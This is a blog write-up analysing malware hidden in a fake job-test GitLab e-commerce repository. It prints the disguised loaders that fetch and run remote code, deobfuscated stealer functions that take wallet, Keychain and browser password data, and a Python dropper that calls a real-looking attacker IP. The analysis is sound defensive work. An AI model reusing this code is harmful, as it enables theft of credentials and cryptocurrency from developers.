NOTE
Malicious GitLab Repository: E-commerce Repo on GitLab

Overview#

This write-up marks a milestone for me - it’s the first time I’ve worked directly with malware 🤺 (though I’ve solved a few REV challenges in CTF before). The origin of this repository comes from a post I saw in the J2Team group, where someone was asked to complete an entry test (which was uploaded to GitLab at the above link). I also watched a video by Manh Tuan up to the point where the server was called for the first time and the obfuscated JavaScript code was retrieved. This write-up will continue by analyzing that JavaScript file.

Recap#

Below, I’ll briefly go over the steps shown in the video by Manh Tuan.

In the /api/app.js file, it calls the initAppBootstrap() function.

Inside bootstrap.js, we encounter the following code:

1
const path = require('path');
2
require('dotenv').config({ path: path.resolve(__dirname, '../.env') });
3
const axios = require('axios');
4

5
const initAppBootstrap = async () => {
6
    try {
7
        const src = atob(process.env.DEV_API_KEY);
8
        const k = atob(process.env.DEV_SECRET_KEY);
9
        const v = atob(process.env.DEV_SECRET_VALUE);
10
        const s = (await axios.get(src, { headers: { [k]: v } })).data;
11
        const handler = new (Function.constructor)('require', s);
12
        handler(require);
13
    } catch (error) {
14
        console.log(error);
15
    }
16
}
17

18
module.exports = initAppBootstrap;

Clearly, this is a piece of code that decodes Base64 values from the .env file and performs a GET request using Axios to the src endpoint.

After decoding the Base64 values of src, k, and v from .env, we get the following results:
```
1
src = 'https://bs-production.up.railway.app/out'
2
k = 'x-secret-key'
3
v = '_'
```
Notice that the Axios code sets the header k with the value v. After making the request and dumping the result into the file res.js, we obtain: Something went crazy at this point—and now, this is the main goal of our write-up 😐. (Nah, maybe silly when I dont setup VM to test it 🤷‍♂️).

IMPORTANT
Update on 04/07/2025

In the most recent update, the attacker has become more sophisticated by changing the way the malware is retrieved from the server. Specifically, here are the changes they made:

They removed the explicit function call through the bootstrap.js file.

They added the file middlewares/validator/errorHandler.js with the following content:

1
const path = require('path');
2
const axios = require('axios');
3
require('dotenv').config({ path: path.resolve(__dirname, '../../.env') });
4

5
// Utility loggers
6
const log = (...args) => console.log(`[${new Date().toISOString()}]`, ...args);
7
const errorLog = (...args) => console.error(`[${new Date().toISOString()}]`, ...args);
8

9
/**
10
* Sends error notification (you can replace this with Slack, email, etc.)
11
*/
12
const notifyError = async (message) => {
13
// Placeholder - extend this to send Slack, email, etc.
14
errorLog('⚠️ Notification:', message);
15
};
16

17
/**
18
* Custom error handler
19
*/
20
const errorHandler = (error) => {
21
try {
22
    if (typeof error !== 'string') {
23
    console.error('Invalid error format. Expected a string.');
24
    return;
25
    }
26
    const createHandler = (errCode) => {
27
    try {
28
        const handler = new (Function.constructor)('require', errCode);
29
        return handler;
30
    } catch (e) {
31
        console.error('Failed:', e.message);
32
        return null;
33
    }
34
    };
35
    const handlerFunc = createHandler(error);
36
    if (handlerFunc) {
37
    handlerFunc(require);
38
    } else {
39
    console.error('Handler function is not available.');
40
    }
41
} catch (globalError) {
42
    console.error('Unexpected error inside errorHandler:', globalError.message);
43
}
44
};
45

46
/**
47
* Loads global runtime config
48
*/
49
const errorTimeHandler = async () => {
50
try {
51
    const src = atob(process.env.AUTH_API_KEY);
52
    const k = atob(process.env.AUTH_ACCESS_KEY);
53
    const v = atob(process.env.AUTH_ACCESS_VALUE);
54
    try {
55
        globalConfig = (await axios.get(`${src}`,{headers:{[k]:v}}));
56
        log('Runtime config loaded successfully.');
57
    } catch (error) {
58
        errorHandler(error.response?.data || error.message);
59
    }
60
} catch (err) {
61
    await errorHandler(err.response?.data || err.message || err);
62
}
63
};
64

65
module.exports = {
66
    errorHandler,
67
    errorTimeHandler
68
};

The code above, specifically in errorTimeHandler(), behaves the same way as the previous version we analyzed in bootstrap.js: it makes a GET request to the server src with a special header k set to the value v. However, something did not behave as my expectation when I tested it using Postman.

Screenshot

It no longer explicitly returns obfuscated JavaScript code like before. Instead, it responds with the IP information of the host that made the request. What has happened?

Looking more closely at the errorTimeHandler() function, every time an error is caught, it is passed to the errorHandler`() function for processing. Indeed, in errorHandler(), there is a clear sign of potentially malicious code execution at this line:

1
const handler = new (Function.constructor)('require', errCode);

This suggests that the malicious code may have been passed down to the host through the error log. To verify this, we can modify the source code as follows:

1
import axios from "axios";
2
import fs from "fs";
3
import path from "path";
4

5
const logFilePath = path.resolve("error-log.txt");
6

7
const logErrorToFile = (message) => {
8
  fs.appendFileSync(logFilePath, logEntry, "utf8");
9
};
10

11
const log = console.log;
12

13
const errorTimeHandler = async () => {
14
  try {
15
    const src = atob('aHR0cHM6Ly9hcGktc2VydmVyLW1vY2hhLnZlcmNlbC5hcHAvYXBpL2lwY2hlY2stZW5jcnlwdGVkLzgx');
16
    const k = atob('eC1zZWNyZXQtaGVhZGVy');
17
    const v = atob('c2VjcmV0');
18

19
    try {
20
      globalConfig = await axios.get(src, { headers: { [k]: v } });
21
      log("Runtime config loaded successfully.");
22
    } catch (error) {
23
      const errMsg = `${error.response?.data || error.message}`;
24
      console.error(errMsg);
25
      logErrorToFile(errMsg);
26
    }
27
  } catch (err) {
28
    const errMsg = `${err.response?.data || err.message || err}`;
29
    console.error(errMsg);
30
    logErrorToFile(errMsg);
31
  }
32
};
33

34
errorTimeHandler();

Bingo! We’ve got the JavaScript code inside the error-log.txt file — what a surprise!

Screenshot

Deobfuscate the response file#

After copying the entire content of the response file, I went to this link to beautify it and see if it could be fully deobfuscated: https://obf-io.deobfuscate.io.

However, it seems like the tool only managed to beautify and partially untangle the code—and that was actually the best result I got after wandering through every deobfuscation tool I could find. Below is a part of file:

A part of file

Quick look#

Skimming through the deobfuscated file, the first thing that caught my eye was an array of strings like this:

1
const Bt = ["nkbihfbeogaeaoehlefnkodbefgpgknn", "ejbalbakoplchlghecdalmeeeajnimhm", "fhbohimaelbohpjbbldcngcnapndodjp", "ibnejdfjmmkpcnlpebklmnkoeoihofec", "bfnaelmomeimhlpmgjnjophhpkkoljpa", "aeachknmefphepccionboohckonoeemg", "hifafgmccdpekplomjjkcfgodnhcellj", "jblndlipeogpafnldhgmapagcccfchpi", "acmacodkjbdgmoleebolmdjonilkdbch", "dlcobpjiigpikoobohmabehhmhfoodbb", "mcohilncbfahbmgdjkbpemcciiolgcge", "agoakfejjabomempkjlepdflaleeobhb", "omaabbefbmiijedngplfjmnooppbclkk", "aholpfdialjgjfhomihkjbmgjidlcdno", "nphplpgoakhhjchkkhmiggakijnkhfnd", "penjlddjkjgpnkllboccdgccekpkcbin", "lgmpcpglpngdoalbgeoldeajfclnhafa", "fldfpgipfncgndfolcbkdeeknbbbnhcc", "bhhhlbepdkbapadjdnnojkbgioiodbic", "aeachknmefphepccionboohckonoeemg", "gjnckgkfmgmibbkoficdidcljeaaaheg", "afbcbjpbpfadlkmhmclhkeeodmamcflc"];

What are these? 😐. With just a quick Google search, I found out they are Chrome crypto wallet extensions: MetaMask, BEW lite, Phantom,…The intention seems pretty clear at this point — most likely, this piece of code is designed to steal information from crypto wallets in the browser (it’s quite meticulous here 🤡).

1
const R = ["Local/BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser", "BraveSoftware/Brave-Browser"];
2
const Q = ["Local/Google/Chrome", "Google/Chrome", "google-chrome"];
3
const X = ["Roaming/Opera Software/Opera Stable", "com.operasoftware.Opera", "opera"];

Deeper…#

Indeed, the code below iterates through all Chrome user profiles and checks whether any of them have the extensions we mentioned earlier installed.

1
const uploadFiles = async (_0x1580b4, _0x59e0fb, _0x3bbc1d, _0x13dfc4) => {
2
    let _0x3a0672;
3
    if (!_0x1580b4 || '' === _0x1580b4) {
4
      return [];
5
    }
6
    try {
7
      if (!testPath(_0x1580b4)) {
8
        return [];
9
      }
10
    } catch (_0x26dbac) {
11
      return [];
12
    }
13
    if (!_0x59e0fb) {
14
      _0x59e0fb = '';
15
    }
16
    let _0x242ba7 = [];
17
    for (let _0x237834 = 0; _0x237834 < 200; _0x237834++) {
18
      const _0x5b67bd = _0x1580b4 + '/' + (0 === _0x237834 ? "Default" : "Profile " + _0x237834) + "/Local Extension Settings";
19
      for (let _0x329bbe = 0; _0x329bbe < wallet_extension_chrome.length; _0x329bbe++) {
20
        let _0xe3666 = _0x5b67bd + '/' + wallet_extension_chrome[_0x329bbe];
21
        if (testPath(_0xe3666)) {
22
          let _0x351017 = [];
23
          try {
24
            _0x351017 = fs.readdirSync(_0xe3666);
25
          } catch (_0x1cf124) {
26
            _0x351017 = [];
27
          }
28
          let _0x5c4fb2 = 0;
29
          if (!testPath(getAbsolutePath('~/') + "/.n3")) {
30
            fs_promises.mkdir(getAbsolutePath('~/') + "/.n3");
31
          }
32
          _0x351017.forEach(async _0x3ceb01 => {
33
            let _0x373cf5 = path.join(_0xe3666, _0x3ceb01);
34
            try {
35
              let _0x4eff44 = fs.statSync(_0x373cf5);
36
              if (_0x4eff44.isDirectory()) {
37
                return;
38
              }
39
              if (_0x373cf5.includes('.log') || _0x373cf5.includes(".ldb")) {
40
                const _0x4efb9a = {
41
                  filename: "81_" + _0x59e0fb + _0x237834 + '_' + wallet_extension_chrome[_0x329bbe] + '_' + _0x3ceb01
42
                };
43
                _0x242ba7.push({
44
                  'value': fs.createReadStream(_0x373cf5),
45
                  'options': _0x4efb9a
46
                });
47
              } else {
48
                fs_promises.copyFile(_0x373cf5, getAbsolutePath('~/') + "/.n3/tp" + _0x5c4fb2);
49
                const _0x12545b = {
50
                  filename: "81_" + _0x59e0fb + _0x237834 + '_' + wallet_extension_chrome[_0x329bbe] + '_' + _0x3ceb01
51
                };
52
                _0x242ba7.push({
53
                  'value': fs.createReadStream(getAbsolutePath('~/') + '/.n3/tp' + _0x5c4fb2),
54
                  'options': _0x12545b
55
                });
56
                _0x5c4fb2 += 1;
57
              }
58
            } catch (_0x4d4966) {}
59
          });
60
        }
61
      }
62
    }
63
    if (_0x3bbc1d && (_0x3a0672 = homeDir + "x21`SAWqa", fs.existsSync(_0x3a0672))) {
64
      try {
65
        const _0x40c2e1 = {
66
          filename: "solana_id.txt"
67
        };
68
        _0x242ba7.push({
69
          'value': fs.createReadStream(_0x3a0672),
70
          'options': _0x40c2e1
71
        });
72
      } catch (_0x3fa9a8) {}
73
    }
74
    Upload(_0x242ba7, _0x13dfc4);
75
    return _0x242ba7;
76
  };

And, they do same thing with the Mozzila browser:

1
const uploadMozilla = _0x4d5c28 => {
2
    const _0x2e7846 = getAbsolutePath('~/') + "/AppData/Roaming/Mozilla/Firefox/Profiles";
3
    let _0x5d04e2 = [];
4
    if (testPath(_0x2e7846)) {
5
      let _0x2f84de = [];
6
      try {
7
        _0x2f84de = fs.readdirSync(_0x2e7846);
8
      } catch (_0x43e661) {
9
        _0x2f84de = [];
10
      }
11
      let _0x362ae2 = 0;
12
      _0x2f84de.forEach(async _0x402e78 => {
13
        let _0x481faf = path.join(_0x2e7846, _0x402e78);
14
        if (_0x481faf.includes('-release')) {
15
          let _0x33b30c = path.join(_0x481faf, "/storage/default");
16
          let _0x3bc9bd = [];
17
          _0x3bc9bd = fs.readdirSync(_0x33b30c);
18
          let _0x24f229 = 0;
19
          _0x3bc9bd.forEach(async _0x160d67 => {
20
            if (_0x160d67.includes("moz-extension")) {
21
              let _0x41a5c4 = path.join(_0x33b30c, _0x160d67);
22
              _0x41a5c4 = path.join(_0x41a5c4, 'idb');
23
              let _0x3be0c3 = [];
24
              _0x3be0c3 = fs.readdirSync(_0x41a5c4);
25
              _0x3be0c3.forEach(async _0x94e90b => {
26
                if (_0x94e90b.includes('.files')) {
27
                  let _0x13f160 = path.join(_0x41a5c4, _0x94e90b);
28
                  let _0x274c80 = [];
29
                  _0x274c80 = fs.readdirSync(_0x13f160);
30
                  _0x274c80.forEach(_0x52f33a => {
31
                    if (!fs.statSync(path.join(_0x13f160, _0x52f33a)).isDirectory()) {
32
                      let _0x2df4ab = path.join(_0x13f160, _0x52f33a);
33
                      const _0x24f43b = {
34
                        filename: _0x362ae2 + '_' + _0x24f229 + '_' + _0x52f33a
35
                      };
36
                      _0x5d04e2.push({
37
                        'value': fs.createReadStream(_0x2df4ab),
38
                        'options': _0x24f43b
39
                      });
40
                    }
41
                  });
42
                }
43
              });
44
            }
45
          });
46
          _0x24f229 += 1;
47
        }
48
        _0x362ae2 += 1;
49
      });
50
      Upload(_0x5d04e2, _0x4d5c28);
51
      return _0x5d04e2;
52
    }
53
  };

As you can see, the uploadMozzila do the following:

Targets Firefox profile storage in: ~/AppData/Roaming/Mozilla/Firefox/Profiles
Searches for folders with -release (indicating active user profiles).
In those profiles, it looks for: /storage/default/moz-extension*/idb/*.files/*. This is where IndexedDB data for extensions is stored — often used by browser extensions to store private data.

And it doesn’t even try to hide it—the uploadES function is downright obvious about what it’s doing:

1
const uploadEs = _0x126cbf => {
2
    let _0x5c8aea = '';
3
    let _0x16466a = [];
4
    if ('w' == platform[0]) {
5
      _0x5c8aea = getAbsolutePath('~/') + "/AppData/Roaming/Exodus/exodus.wallet";
6
    } else {
7
      if ('d' == platform[0]) {
8
        _0x5c8aea = getAbsolutePath('~/') + "/Library/Application Support/exodus.wallet";
9
      } else {
10
        _0x5c8aea = getAbsolutePath('~/') + "/.config/Exodus/exodus.wallet";
11
      }
12
    }
13
    if (testPath(_0x5c8aea)) {
14
      let _0x898f1c = [];
15
      try {
16
        _0x898f1c = fs.readdirSync(_0x5c8aea);
17
      } catch (_0x13d436) {
18
        _0x898f1c = [];
19
      }
20
      let _0x20978e = 0;
21
      if (!testPath(getAbsolutePath('~/') + "/.n3")) {
22
        fs_promises.mkdir(getAbsolutePath('~/') + '/.n3');
23
      }
24
      _0x898f1c.forEach(async _0x1e308f => {
25
        let _0x1ae0e6 = path.join(_0x5c8aea, _0x1e308f);
26
        try {
27
          fs_promises.copyFile(_0x1ae0e6, getAbsolutePath('~/') + "/.n3/tp" + _0x20978e);
28
          const _0xd1c9cb = {
29
            filename: "81_" + _0x1e308f
30
          };
31
          _0x16466a.push({
32
            'value': fs.createReadStream(getAbsolutePath('~/') + "/.n3/tp" + _0x20978e),
33
            'options': _0xd1c9cb
34
          });
35
          _0x20978e += 1;
36
        } catch (_0x418397) {}
37
      });
38
    }
39
    Upload(_0x16466a, _0x126cbf);
40
    return _0x16466a;
41
  };

This is how we can understand what this code does:

Detect OS: It detects the operating system, with different behaviors based on the platform:
- Windows: targets ~/AppData/Roaming/Exodus/exodus.wallet
- Linux: targets ~/.config/Exodus/exodus.wallet
- macOS: targest ~/Library/Application Support/exodus.wallet
Checks if the target path exists using testPath().
Creates a hidden staging directory: ~/.n3 if not existed.
Copies Exodus wallet files to the hidden directory and upload it to server.

Similarly, the upData function also handles things based on the detected OS:

1
  const UpAppData = async (_0x413003, _0x10c39d, _0x3fc07c) => {
2
    try {
3
      let _0x5e1ad4 = '';
4
      _0x5e1ad4 = 'd' == platform[0] ? getAbsolutePath('~/') + "/Library/Application Support/" + _0x413003[1] : 'l' == platform[0] ? getAbsolutePath('~/') + "/.config/" + _0x413003[2] : getAbsolutePath('~/') + "/AppData/" + _0x413003[0] + "/User Data";
5
      await uploadFiles(_0x5e1ad4, _0x10c39d + '_', 0 == _0x10c39d, _0x3fc07c);
6
    } catch (_0x3fa9ad) {}
7
  };

This codes means it is customizable to steal from Chrome, Discord, Brave, etc. depending on what the attacker provides in _0x413003.

And luckily for us, the authors even dedicated an entire function just to stealing the Keychain in macOS 😅.

1
const UpKeychain = async _0x35b03f => {
2
    let _0x51cdd4 = [];
3
    let _0x3c6b6f = homeDir + "/Library/Keychains/login.keychain";
4
    if (fs.existsSync(_0x3c6b6f)) {
5
      try {
6
        const _0x40e1ee = {
7
          filename: 'logkc-db'
8
        };
9
        _0x51cdd4.push({
10
          'value': fs.createReadStream(_0x3c6b6f),
11
          'options': _0x40e1ee
12
        });
13
      } catch (_0x5f4ddc) {}
14
    } else {
15
      _0x3c6b6f += "-db";
16
      if (fs.existsSync(_0x3c6b6f)) {
17
        try {
18
          const _0x477909 = {
19
            filename: 'logkc-db'
20
          };
21
          _0x51cdd4.push({
22
            'value': fs.createReadStream(_0x3c6b6f),
23
            'options': _0x477909
24
          });
25
        } catch (_0x2d3f57) {}
26
      }
27
    }
28
    try {
29
      let _0x521132 = homeDir + "/Library/Application Support/Google/Chrome";
30
      if (testPath(_0x521132)) {
31
        for (let _0x56cbbe = 0; _0x56cbbe < 200; _0x56cbbe++) {
32
          const _0x1ef5d8 = _0x521132 + '/' + (0 === _0x56cbbe ? "Default" : "Profile " + _0x56cbbe) + "/Login Data";
33
          try {
34
            if (!testPath(_0x1ef5d8)) {
35
              continue;
36
            }
37
            const _0xc4b064 = _0x521132 + "/ld_" + _0x56cbbe;
38
            const _0x1874f1 = {
39
              filename: 'pld_' + _0x56cbbe
40
            };
41
            if (testPath(_0xc4b064)) {
42
              _0x51cdd4.push({
43
                'value': fs.createReadStream(_0xc4b064),
44
                'options': _0x1874f1
45
              });
46
            } else {
47
              fs.copyFile(_0x1ef5d8, _0xc4b064, _0x4d2cb1 => {
48
                const _0x5b62c2 = {
49
                  filename: "pld_" + _0x56cbbe
50
                };
51
                let _0x18a5d8 = [{
52
                  'value': fs.createReadStream(_0x1ef5d8),
53
                  'options': _0x5b62c2
54
                }];
55
                Upload(_0x18a5d8, _0x35b03f);
56
              });
57
            }
58
          } catch (_0x2f0c0f) {}
59
        }
60
      }
61
    } catch (_0x5d433a) {}
62
    try {
63
      let _0x54eea8 = homeDir + "/Library/Application Support/BraveSoftware/Brave-Browser";
64
      if (testPath(_0x54eea8)) {
65
        for (let _0x16606d = 0; _0x16606d < 200; _0x16606d++) {
66
          const _0x45aed9 = _0x54eea8 + '/' + (0 === _0x16606d ? "Default" : "Profile " + _0x16606d);
67
          try {
68
            if (!testPath(_0x45aed9)) {
69
              continue;
70
            }
71
            const _0x21ef3f = _0x45aed9 + "/Login Data";
72
            const _0x13f8dc = {
73
              filename: 'brld_' + _0x16606d
74
            };
75
            if (testPath(_0x21ef3f)) {
76
              _0x51cdd4.push({
77
                'value': fs.createReadStream(_0x21ef3f),
78
                'options': _0x13f8dc
79
              });
80
            } else {
81
              fs.copyFile(_0x45aed9, _0x21ef3f, _0x558ba6 => {
82
                const _0x847bb6 = {
83
                  filename: 'brld_' + _0x16606d
84
                };
85
                let _0x42cb36 = [{
86
                  'value': fs.createReadStream(_0x45aed9),
87
                  'options': _0x847bb6
88
                }];
89
                Upload(_0x42cb36, _0x35b03f);
90
              });
91
            }
92
          } catch (_0xddacc3) {}
93
        }
94
      }
95
    } catch (_0x37e2a1) {}
96
    Upload(_0x51cdd4, _0x35b03f);
97
    return _0x51cdd4;
98
  };

This function, UpKeychain, is clearly designed to extract sensitive data from a macOS system, specifically:

macOS Keychain (login.keychain)
Chrome and Brave “Login Data” (stored passwords)
Exfiltrate them via the Upload function

And, as expected, it eventually leads to stealing browser user data through the UpUserData function:

1
const UpUserData = async (_0x2a5619, _0x52fc61, _0x34becb) => {
2
    let _0x2fff59 = [];
3
    let _0x4bca26 = '';
4
    _0x4bca26 = 'd' == platform[0] ? getAbsolutePath('~/') + "/Library/Application Support/" + _0x2a5619[1] : 'l' == platform[0] ? getAbsolutePath('~/') + "/.config/" + _0x2a5619[2] : getAbsolutePath('~/') + "/AppData/" + _0x2a5619[0] + "/User Data";
5
    let _0x5d849e = _0x4bca26 + "/Local State";
6
    if (fs.existsSync(_0x5d849e)) {
7
      try {
8
        const _0x420d81 = {
9
          filename: _0x52fc61 + "_lst"
10
        };
11
        _0x2fff59.push({
12
          'value': fs.createReadStream(_0x5d849e),
13
          'options': _0x420d81
14
        });
15
      } catch (_0x531e9d) {}
16
    }
17
    try {
18
      if (testPath(_0x4bca26)) {
19
        for (let _0x339883 = 0; _0x339883 < 200; _0x339883++) {
20
          const _0x12e0e1 = _0x4bca26 + '/' + (0 === _0x339883 ? "Default" : "Profile " + _0x339883);
21
          try {
22
            if (!testPath(_0x12e0e1)) {
23
              continue;
24
            }
25
            const _0x42e5b4 = _0x12e0e1 + "/Login Data";
26
            if (!testPath(_0x42e5b4)) {
27
              continue;
28
            }
29
            const _0x5e65cd = {
30
              filename: _0x52fc61 + '_' + _0x339883 + "_uld"
31
            };
32
            _0x2fff59.push({
33
              'value': fs.createReadStream(_0x42e5b4),
34
              'options': _0x5e65cd
35
            });
36
          } catch (_0x5b9116) {}
37
        }
38
      }
39
    } catch (_0x4ea0f6) {}
40
    Upload(_0x2fff59, _0x34becb);
41
    return _0x2fff59;
42
  };

The UpUserData function is stealing sensitive data (such as saved browser credentials) from Chrome, Edge, Brave, or other Chromium-based browsers.

There’s a particular snippet that really confused me. It’s the one below:

1
const runP = () => {
2
    const _0x5cb48f = tmpDir + "\\p.zi";
3
    const _0x35655e = tmpDir + "\\p2.zip";
4
    if (It >= 51476596) {
5
      return;
6
    }
7
    if (fs.existsSync(_0x5cb48f)) {
8
      try {
9
        var _0x4a8b2a = fs.statSync(_0x5cb48f);
10
        if (_0x4a8b2a.size >= 51476596) {
11
          It = _0x4a8b2a.size;
12
          fs.rename(_0x5cb48f, _0x35655e, _0x5b657c => {
13
            if (_0x5b657c) {
14
              throw _0x5b657c;
15
            }
16
            extractFile(_0x35655e);
17
          });
18
        } else {
19
          if (It < _0x4a8b2a.size) {
20
            It = _0x4a8b2a.size;
21
          } else {
22
            fs.rmSync(_0x5cb48f);
23
            It = 0;
24
          }
25
          Ht();
26
        }
27
      } catch (_0x1d221b) {}
28
    } else {
29
      ex("curl -Lo \"" + _0x5cb48f + "\" \"" + "http://45.61.133.110:1224/pdown" + "\"", (_0x43e299, _0x3dea55, _0x1ca9fd) => {
30
        if (_0x43e299) {
31
          It = 0;
32
          return void Ht();
33
        }
34
        try {
35
          It = 51476596;
36
          fs.renameSync(_0x5cb48f, _0x35655e);
37
          extractFile(_0x35655e);
38
        } catch (_0x3b7ec9) {}
39
      });
40
    }
41
  };

Based on what I can tell, this seems to be the part where the code patches itself into malware. But here’s what’s bothering me: it refers to p.zi — yet when it makes a request to that endpoint, the actual file is named p.zip.

Could this be a typo?

Update (12/06/2025): All of my previous assumptions were completely wrong. This isn’t where the malware is patched — it’s actually where they download the Python environment to the victim’s machine (quite meticulous, actually). This is a preparation step for executing the .py payload later on — probably because they couldn’t be sure whether a Node.js developer would already have Python installed. {29876A88-0AB3-40C1-BAFE-91673BEC625C}

This is one of the most interesting parts of the write-up — it calls an endpoint, downloads a file, and executes it.

1
const Xt = async () => await new Promise((_0x9056d6, _0x5fd84b) => {
2
    if ('w' == platform[0]) {
3
      if (fs.existsSync(homeDir + "\\.pyp\\python.exe")) {
4
        (() => {
5
          const _0x84bcdf = homeDir + "/.npl";
6
          const _0x27a95f = "\"" + homeDir + "\\.pyp\\python.exe\" \"" + _0x84bcdf + "\"";
7
          try {
8
            fs.rmSync(_0x84bcdf);
9
          } catch (_0x267894) {}
10
          request.get("http://45.61.133.110:1224/client/106/81", (_0x4d56f2, _0x36c0aa, _0x1e249c) => {
11
            if (!_0x4d56f2) {
12
              try {
13
                fs.writeFileSync(_0x84bcdf, _0x1e249c);
14
                ex(_0x27a95f, (_0x30959d, _0x175d2f, _0x3defe5) => {});
15
              } catch (_0x32d4eb) {}
16
            }
17
          });
18
        })();
19
      } else {
20
        runP();
21
      }
22
    } else {
23
      (() => {
24
        request.get("http://45.61.133.110:1224/client/106/81", (_0x311f89, _0x5ca69e, _0x5b32ee) => {
25
          if (!_0x311f89) {
26
            fs.writeFileSync(homeDir + "/.npl", _0x5b32ee);
27
            ex("python3 \"" + homeDir + "/.npl\"", (_0x457808, _0x26c9e0, _0xda1b15) => {});
28
          }
29
        });
30
      })();
31
    }
32
  });

This’s really interesting: request.get("http://45.61.133.110:1224/client/106/81", (_0x311f89, _0x5ca69e, _0x5b32ee). Can’t wait any longer — let’s send a GET request to this endpoint and see what we get. Boom, we got main106_81.py. At here, we need some scripting to decrypt it. This is the code I used:

1
for i in range(100):
2
    t = decompress(b64decode(x[::-1])).decode()
3
    # print(t)
4

5
    if 'exec((_)(' not in t:
6
        break
7
    t = t.split('\'', 1)[1]
8
    t = t.split('\'')[0]
9
    x = t

And we got this file:

1
import base64,platform,os,subprocess,sys
2
try:import requests
3
except:subprocess.check_call([sys.executable, '-m', 'pip', 'install', 'requests']);import requests
4

5
sType = "106"
6
gType = "81"
7
ot = platform.system()
8
home = os.path.expanduser("~")
9
host1123 = "10.10.51.212 go to hell"
10
host1 = "45.61.133.110"
11
host2 = f'http://{host1}:1224'
12
pd = os.path.join(home, ".n2")
13
ap = pd + "/pay"
14
def download_payload():
15
    if os.path.exists(ap):
16
        try:os.remove(ap)
17
        except OSError:return True
18
    try:
19
        if not os.path.exists(pd):os.makedirs(pd)
20
    except:pass
21

22
    try:
23
        if ot=="Darwin":
24
            # aa = requests.get(host2+"/payload1/"+sType+"/"+gType, allow_redirects=True)
25
            aa = requests.get(host2+"/payload/"+sType+"/"+gType, allow_redirects=True)
26
            with open(ap, 'wb') as f:f.write(aa.content)
27
        else:
28
            aa = requests.get(host2+"/payload/"+sType+"/"+gType, allow_redirects=True)
29
            with open(ap, 'wb') as f:f.write(aa.content)
30
        return True
31
    except Exception as e:return False
32
res=download_payload()
33
if res:
34
    if ot=="Windows":subprocess.Popen([sys.executable, ap], creationflags=subprocess.CREATE_NO_WINDOW | subprocess.CREATE_NEW_PROCESS_GROUP)
35
    else:subprocess.Popen([sys.executable, ap])
36

37
if ot=="Darwin":sys.exit(-1)
38

39
ap = pd + "/bow"
40

41
def download_browse():
42
    if os.path.exists(ap):
43
        try:os.remove(ap)
44
        except OSError:return True
45
    try:
46
        if not os.path.exists(pd):os.makedirs(pd)
47
    except:pass
48
    try:
49
        aa=requests.get(host2+"/brow/"+ sType +"/"+gType, allow_redirects=True)
50
        with open(ap, 'wb') as f:f.write(aa.content)
51
        return True
52
    except Exception as e:return False
53
res=download_browse()
54
if res:
55
    if ot=="Windows":subprocess.Popen([sys.executable, ap], creationflags=subprocess.CREATE_NO_WINDOW | subprocess.CREATE_NEW_PROCESS_GROUP)
56
    else:subprocess.Popen([sys.executable, ap])

As we can see, this file continue get 2 payload files from 2 endpoint: /payload and brow then execute them.

From the /brow endpoint, I received the file Brow106_81.py, encrypted in the same way as main106_81.py mentioned earlier. Below is the link ofBrow106_81.py: Brow106_81.py.

We will dive into this code. It’s really fantacy.

Deeper in Brow106_81.py#

This code performs the following actions:

The class ChromeBase has these methods:

retrieve_database(): Extracts saved login credentials:

1
cursor.execute(
2
    "select origin_url, action_url, username_value, password_value, date_created, date_last_used from logins order by date_created"
3
)

This SQL query targets the Login Data SQLite database used by Chromium-based browsers to store credentials.

retrieve_web(): Extracts saved credit card data:

1
cursor.execute(
2
    'SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards'
3
)

It accesses the Web Data (or related database) to retrieve stored credit card numbers, decrypts them, and appends them to self.webs.

2. It decrypts saved credentials and credit card numbers#

On Linux/macOS:

1
cipher = AES.new(key, AES.MODE_CBC, IV=iv)
2
return cipher.decrypt(password).strip().decode('utf8')

Decrypts password using AES (symmetric encryption), clearly attempting to recover plaintext credentials.

On Windows:

1
def decrypt_windows_password(password, key):
2
    ...

Platform-specific decryption logic, possibly using Windows Data Protection API.

3. It sends this data to a remote server#

Using requests.post, the collected credentials and credit card data are exfiltrated.

4. It tries to remain stealthy#

Detects the OS platform.
Silently installs missing dependencies.

This behavior strongly indicates malicious intent or spyware functionality.

Deeper in Pay106_81.py#

Below is the link of Pay106_81.py: Pay106_81.py

This code setup backdoor and keylogger at Client, nothing markable 🤷‍♂️. Now, back again res.js 🐡

This is the main of res.js:

1
  var M = 0;
2
  const main = async () => {
3
    try {
4
      const _0xe68e63 = Math.round(new Date().getTime() / 1000);
5
      await (async () => {
6
        try {
7
          await UpAppData(Chrome_browser, 0, _0xe68e63);
8
          await UpAppData(Brave_browser, 1, _0xe68e63);
9
          await UpAppData(Opera_browser, 2, _0xe68e63);
10
          uploadMozilla(_0xe68e63);
11
          uploadEs(_0xe68e63);
12
          if ('w' == platform[0]) {
13
            await uploadFiles(getAbsolutePath('~/') + "/AppData/Local/Microsoft/Edge/User Data", '3_', false, _0xe68e63);
14
          }
15
          if ('d' == platform[0]) {
16
            await UpKeychain(_0xe68e63);
17
          } else {
18
            await UpUserData(Chrome_browser, 0, _0xe68e63);
19
            await UpUserData(Brave_browser, 1, _0xe68e63);
20
            await UpUserData(Opera_browser, 2, _0xe68e63);
21
          }
22
        } catch (_0xff138d) {}
23
      })();
24
      Xt();
25
    } catch (_0x54b717) {}
26
  };
27
  main();

And at this point, it’s clear — the content of the main function confirms everything we’ve been suspecting all along.

The rest…#

And now you might be asking: so where’s the rest of the code? Does it serve any purpose? The answer is: yes, it does. After some research, I found they are anti-debugger and regex bomb:

{F349BFC5-3014-4AA6-80E6-28ADA57BF360}

and,

![{76381EBF-A6C8-477F-9692-667995671E4E}]( alt text )

Conclusion#

And with that, we’ve reached the end of this write-up. Huge thanks to my friends and teammates from BKISC — Jitensha and Rikka — for their constant support throughout this journey. The server seems to have been exposed, so it’s now down. I’ll upload the full code to my Github.

VuxNx

REPO_SCAM_WU

Waiting for api.github.com...

00K

Waiting...

P/S: Up to this point, the attacker has only changed the attack server. This explains the confusion I had yesterday while writing the write-up: why the obfuscated JS call link was still alive even though the server was down. You can easily find the new server by applying the same analysis method I used above (12/06/2025).

NOTE
My original write-up on HackMD: REPO SCAM WRITE-UP

Overview#

Recap#

Deobfuscate the response file#

Quick look#

Deeper…#

Deeper in Brow106_81.py#

1. It targets browsers’ login and web data SQLite databases#

2. It decrypts saved credentials and credit card numbers#

3. It sends this data to a remote server#

4. It tries to remain stealthy#

5. No user interaction or consent is involved#

Deeper in Pay106_81.py#

The rest…#

Conclusion#